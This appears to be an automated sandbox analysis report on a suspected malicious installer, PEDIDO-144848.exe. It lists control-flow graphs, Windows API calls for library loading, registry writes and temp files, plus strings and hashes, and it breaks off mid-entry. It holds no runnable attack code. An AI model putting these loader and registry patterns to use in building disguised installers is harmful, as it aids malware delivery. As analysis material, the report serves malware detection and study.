                                                        control_flow_graph 482 4060cb-4060eb GetSystemDirectoryA 483 4060ed 482->483 484 4060ef-4060f1 482->484 483->484 485 406101-406103 484->485 486 4060f3-4060fb 484->486 487 406104-406136 wsprintfA LoadLibraryExA 485->487 486->485 488 4060fd-4060ff 486->488 488->487
                                                        APIs
                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004060E2
                                                        • wsprintfA.USER32 ref: 0040611B
                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040612F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                        • String ID: %s%s.dll$UXTHEME$\
                                                        • API String ID: 2200240437-4240819195
                                                        • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                        • Instruction ID: e39d6de12310bdbc02ec2e887020ee50980fcceaee6e7f6f8e64b4e94942106c
                                                        • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                        • Instruction Fuzzy Hash: 80F0FC30A40115A6EF1497A4DC0DFEB365CAB08305F140176A547E51D2D5B8E9248B69
                                                        Function 00402F33 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 489 402f33-402f47 490 402f50-402f59 489->490 491 402f49 489->491 492 402f62-402f67 490->492 493 402f5b 490->493 491->490 494 402f77-402f84 call 403122 492->494 495 402f69-402f72 call 403138 492->495 493->492 499 403110 494->499 500 402f8a-402f8e 494->500 495->494 501 403112-403113 499->501 502 402f94-402fba GetTickCount 500->502 503 4030bb-4030bd 500->503 506 40311b-40311f 501->506 507 402fc0-402fc8 502->507 508 403118 502->508 504 4030fd-403100 503->504 505 4030bf-4030c2 503->505 511 403102 504->511 512 403105-40310e call 403122 504->512 505->508 513 4030c4 505->513 509 402fca 507->509 510 402fcd-402fdb call 403122 507->510 508->506 509->510 510->499 522 402fe1-402fea 510->522 511->512 512->499 523 403115 512->523 516 4030c7-4030cd 513->516 519 4030d1-4030df call 403122 516->519 520 4030cf 516->520 519->499 526 4030e1-4030ed call 405aba 519->526 520->519 525 402ff0-403010 call 40621c 522->525 523->508 531 4030b3-4030b5 525->531 532 403016-403029 GetTickCount 525->532 533 4030b7-4030b9 526->533 534 4030ef-4030f9 526->534 531->501 535 40302b-403033 532->535 536 40306e-403070 532->536 533->501 534->516 537 4030fb 534->537 538 403035-403039 535->538 539 40303b-40306b MulDiv wsprintfA call 404fb9 535->539 540 403072-403076 536->540 541 4030a7-4030ab 536->541 537->508 538->536 538->539 539->536 542 403078-40307f call 405aba 540->542 543 40308d-403098 540->543 541->507 544 4030b1 541->544 549 403084-403086 542->549 547 40309b-40309f 543->547 544->508 547->525 550 4030a5 547->550 549->533 551 403088-40308b 549->551 550->508 551->547
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CountTick$wsprintf
                                                        • String ID: ... %d%%
                                                        • API String ID: 551687249-2449383134
                                                        • Opcode ID: 85c538cc075ba04794855290aa18cdf04ceba737772e139ba8f68ecbd5a835b1
                                                        • Instruction ID: c8fbb3e8d9104581ad396ff7879acfc5b753e67115e275f424ba67d933986381
                                                        • Opcode Fuzzy Hash: 85c538cc075ba04794855290aa18cdf04ceba737772e139ba8f68ecbd5a835b1
                                                        • Instruction Fuzzy Hash: 6551A27280121AABCB10DF65DA44A9F7BB8EF44756F10413BF800B72C5C7788E51DBAA
                                                        Function 004023D3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73registrystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 552 4023d3-402419 call 402bc3 call 402ace * 2 RegCreateKeyExA 559 40295e-40296d 552->559 560 40241f-402427 552->560 562 402437-40243a 560->562 563 402429-402436 call 402ace lstrlenA 560->563 564 40243c-40244d call 402aac 562->564 565 40244e-402451 562->565 563->562 564->565 570 402462-402476 RegSetValueExA 565->570 571 402453-40245d call 402f33 565->571 574 402478 570->574 575 40247b-402555 RegCloseKey 570->575 571->570 574->575 575->559 577 402729-402730 575->577 577->559
                                                        APIs
                                                        • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402411
                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk7B73.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402431
                                                        • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsk7B73.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040246E
                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsk7B73.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040254F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateValuelstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsk7B73.tmp
                                                        • API String ID: 1356686001-127197393
                                                        • Opcode ID: 2eae85450b92eca2a3c37eaf8981f1ba2892586689a29081bc0333428de2e0a2
                                                        • Instruction ID: 00e854f1b6d20388f4b464fcc1b804607db5fe0ac9957b4d3390b69bb90c797e
                                                        • Opcode Fuzzy Hash: 2eae85450b92eca2a3c37eaf8981f1ba2892586689a29081bc0333428de2e0a2
                                                        • Instruction Fuzzy Hash: 3921A1B1E00109BEEB00EFA4DE49EAF7A78EB50358F20403AF505B61D1C6B85D019B28
                                                        Function 00405A42 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 578 405a42-405a4c 579 405a4d-405a78 GetTickCount GetTempFileNameA 578->579 580 405a87-405a89 579->580 581 405a7a-405a7c 579->581 583 405a81-405a84 580->583 581->579 582 405a7e 581->582 582->583
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00405A56
                                                        • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405A70
                                                        Strings
                                                        • "C:\Users\user\Desktop\PEDIDO-144848.exe", xrefs: 00405A42
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A45
                                                        • nsa, xrefs: 00405A4D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CountFileNameTempTick
                                                        • String ID: "C:\Users\user\Desktop\PEDIDO-144848.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                        • API String ID: 1716503409-2796443484
                                                        • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                        • Instruction ID: a3d8867ec022398f00e7cc0b64f9ef92c2764b579e17a6718397eb4594f2c545
                                                        • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                        • Instruction Fuzzy Hash: 07F0E2327082047BDB108F55EC44B9B7B9CDF91750F10C037FE049A180D2B198448F59
                                                        Function 00402B0E Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 584 402b0e-402b37 RegOpenKeyExA 585 402ba2-402ba6 584->585 586 402b39-402b44 584->586 587 402b5f-402b6f RegEnumKeyA 586->587 588 402b71-402b83 RegCloseKey call 406139 587->588 589 402b46-402b49 587->589 597 402b85-402b94 588->597 598 402ba9-402baf 588->598 590 402b96-402b99 RegCloseKey 589->590 591 402b4b-402b5d call 402b0e 589->591 593 402b9f-402ba1 590->593 591->587 591->588 593->585 597->585 598->593 599 402bb1-402bbf RegDeleteKeyA 598->599 599->593 600 402bc1 599->600 600->585
                                                        APIs
                                                        • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000000,?), ref: 00402B2F
                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B6B
                                                        • RegCloseKey.ADVAPI32(?), ref: 00402B74
                                                        • RegCloseKey.ADVAPI32(?), ref: 00402B99
                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402BB7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Close$DeleteEnumOpen
                                                        • String ID:
                                                        • API String ID: 1912718029-0
                                                        • Opcode ID: 835a18ee0712391a14b10fd83abfdacb871c0e1db67dd3faae47ba34dcff1796
                                                        • Instruction ID: e8770432982ab8decd1ca443e4f50ff6a20a1eaa2a88b85c41c9a6e6fa4e92e0
                                                        • Opcode Fuzzy Hash: 835a18ee0712391a14b10fd83abfdacb871c0e1db67dd3faae47ba34dcff1796
                                                        • Instruction Fuzzy Hash: 49117F36900109FFEF119F90DE89DAE3B7DEB55384F004076FA05B10A0D3B8AE51AB69
                                                        Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 602 100016bd-100016f9 call 10001a5d 606 1000180a-1000180c 602->606 607 100016ff-10001703 602->607 608 10001705-1000170b call 100021b0 607->608 609 1000170c-10001719 call 100021fa 607->609 608->609 614 10001749-10001750 609->614 615 1000171b-10001720 609->615 616 10001770-10001774 614->616 617 10001752-1000176e call 100023da call 10001559 call 10001266 GlobalFree 614->617 618 10001722-10001723 615->618 619 1000173b-1000173e 615->619 623 100017b2-100017b8 call 100023da 616->623 624 10001776-100017b0 call 10001559 call 100023da 616->624 639 100017b9-100017bd 617->639 621 10001725-10001726 618->621 622 1000172b-1000172c call 100027e8 618->622 619->614 625 10001740-10001741 call 10002aa3 619->625 627 10001733-10001739 call 10002589 621->627 628 10001728-10001729 621->628 634 10001731 622->634 623->639 624->639 637 10001746 625->637 643 10001748 627->643 628->614 628->622 634->637 637->643 644 100017fa-10001801 639->644 645 100017bf-100017cd call 100023a0 639->645 643->614 644->606 650 10001803-10001804 GlobalFree 644->650 652 100017e5-100017ec 645->652 653 100017cf-100017d2 645->653 650->606 652->644 655 100017ee-100017f9 call 100014e2 652->655 653->652 654 100017d4-100017dc 653->654 654->652 656 100017de-100017df FreeLibrary 654->656 655->644 656->652
                                                        APIs
                                                          • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                          • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                          • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                        • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                        • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                        • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                          • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                                          • Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB
                                                          • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115168409337.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000000.00000002.115168379839.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.115168440714.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.115168472087.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_10000000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$Alloc$Librarylstrcpy
                                                        • String ID:
                                                        • API String ID: 1791698881-3916222277
                                                        • Opcode ID: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                        • Instruction ID: 7bd52774c71d274dd6e07030a7ef65efb9a892d3f5f2eddd47f658e3267813e4
                                                        • Opcode Fuzzy Hash: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                        • Instruction Fuzzy Hash: B5319C79408205DAFB41DF649CC5BCA37ECFF042D5F018465FA0A9A09EDF78A8858B60
                                                        Function 00405900 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 659 405900-40591b call 405da0 call 4058ab 664 405921-40592e call 40600b 659->664 665 40591d-40591f 659->665 669 405930-405934 664->669 670 40593a-40593c 664->670 666 405973-405975 665->666 669->665 671 405936-405938 669->671 672 405952-40595b lstrlenA 670->672 671->665 671->670 673 40595d-405971 call 405812 GetFileAttributesA 672->673 674 40593e-405945 call 4060a4 672->674 673->666 679 405947-40594a 674->679 680 40594c-40594d call 405859 674->680 679->665 679->680 680->672
                                                        APIs
                                                          • Part of subcall function 00405DA0: lstrcpynA.KERNEL32(?,?,00000400,0040322E,Rse Setup,NSIS Error), ref: 00405DAD
                                                          • Part of subcall function 004058AB: CharNextA.USER32(?,?,C:\,?,00405917,C:\,C:\,758B3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,758B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B9
                                                          • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058BE
                                                          • Part of subcall function 004058AB: CharNextA.USER32(00000000), ref: 004058D2
                                                        • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,758B3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,758B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405953
                                                        • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,758B3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,758B3410,C:\Users\user\AppData\Local\Temp\), ref: 00405963
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                        • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 3248276644-2214159804
                                                        • Opcode ID: 2b232cbcfe35a2a259e0e65083c3ab1013c8774cdbeba63489dc7f6696da3121
                                                        • Instruction ID: 7328fd33adb38864c40c3ad9044401c3b5e3aae7bd0e1b9e961d96be1e2df883
                                                        • Opcode Fuzzy Hash: 2b232cbcfe35a2a259e0e65083c3ab1013c8774cdbeba63489dc7f6696da3121
                                                        • Instruction Fuzzy Hash: D5F0A466115D6096D722333A1C05B9F1A48CEC2374759453BF891F12D2DB3C8953DD7E
                                                        Function 00401FFF Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleA.KERNELBASE(00000000,?,000000F0), ref: 0040202A
                                                          • Part of subcall function 00404FB9: lstrlenA.KERNEL32(0079DD20,00000000,0078FCF8,758B23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000,?), ref: 00404FF2
                                                          • Part of subcall function 00404FB9: lstrlenA.KERNEL32(0040306B,0079DD20,00000000,0078FCF8,758B23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000), ref: 00405002
                                                          • Part of subcall function 00404FB9: lstrcatA.KERNEL32(0079DD20,0040306B,0040306B,0079DD20,00000000,0078FCF8,758B23A0), ref: 00405015
                                                          • Part of subcall function 00404FB9: SetWindowTextA.USER32(0079DD20,0079DD20), ref: 00405027
                                                          • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040504D
                                                          • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405067
                                                          • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405075
                                                        • LoadLibraryExA.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 0040203A
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0040204A
                                                        • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 004020B4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
